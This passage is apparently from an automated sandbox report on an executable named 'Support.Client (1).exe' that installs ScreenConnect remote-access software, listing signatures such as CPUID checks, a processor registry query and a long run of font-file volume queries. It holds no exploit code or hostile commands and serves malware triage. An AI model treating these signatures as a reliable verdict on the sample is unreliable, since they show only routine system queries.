Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1948916428.00000000000F2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr	Binary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass

Language, Device and Operating System Detection

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\Support.Client (1).exe

Code function: 0_2_00611BD4 cpuid

0_2_00611BD4

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
